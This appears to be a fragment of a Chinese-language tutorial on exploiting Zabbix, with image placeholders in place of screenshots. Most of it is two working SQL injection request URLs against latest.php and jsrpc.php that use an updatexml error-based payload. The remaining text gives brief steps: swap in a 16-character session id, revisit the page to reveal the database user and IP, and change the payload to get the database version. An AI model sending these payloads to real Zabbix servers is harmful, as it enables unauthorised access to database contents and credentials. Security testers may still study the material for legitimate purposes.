latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
3.1.2 zabbix(下)_第1张图片
取后面16位,替换之前的
3.1.2 zabbix(下)
3.1.2 zabbix(下)_第2张图片
替换之后,再次访问,就可以看到访问的用户,ip地址。
3.1.2 zabbix(下)
修改这块,可以获得数据库版本。
3.1.2 zabbix(下)
3.1.2 zabbix(下)_第3张图片